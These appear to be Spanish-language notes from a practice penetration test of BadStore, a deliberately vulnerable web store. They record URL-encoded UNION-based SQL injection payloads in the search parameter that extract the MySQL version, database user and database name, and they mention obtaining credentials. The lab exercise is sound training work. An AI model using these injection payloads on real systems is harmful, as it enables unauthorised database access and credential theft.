http://www.bladstore.net/?searchquery=salida&action=search&x=23&y=11 -> sin logears

http://www.bladstore.net/cgi-bin/badstore.cgi?searchquery=admin&action=search&x=24&y=12 -> loguearse

http://www.bladstore.net/cgi-bin/badstore.cgi?searchquery=1000&action=search&x=0&y=0 -> loguear | campo oculto

http://www.bladstore.net/cgi-bin/badstore.cgi?searchquery=1,1,1&action=search&x=0&y=0 
SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE 'admin' IN (itemnum,sdesc,ldesc)


--------------------------------------------------------------------------------------------------------
https://www.bladstore.net/cgi-bin/badstore.cgi?searchquery=&action=admin&x=13&y=14

http://zap/OTHER/quickstartlaunch/other/startPage/?apinonce=9cdf5aeb23f9e75&


ENCONTRAMOS RUTAS QUE PUEDEN LLEGAR A SER VULNERABLES -> y terminamos sacanado credenciales.



URL VULNERABLES A SQL INJECTION 

https://www.bladstore.net/cgi-bin/badstore.cgi?searchquery=1000%27%20and%20%271%27=%271%27%20UNION%20ALL%20SELECT%201,%201,%201,%201%20--%20-%20&action=search&x=0&y=0


EN BASE A NUESTRO ANALISIS SACAMOS LA VERSION DE LA BASE DE DATOS MYSQL CON AYUDA DE (SELECT @@version)

https://www.bladstore.net/cgi-bin/badstore.cgi?searchquery=1000%27%20and%20%271%27=%271%27%20UNION%20ALL%20SELECT%20(SELECT%20@@version),%201,%201,%201%20--%20-%20&action=search&x=0&y=0

Version Base de datos (SELECT @@version): 4.1.7-standard
Pudimos sacarnos el usuario (SELECT user()): root@localhost
Podemos ver el nombre de la base de datos (SELECT database()) : badstoredb 




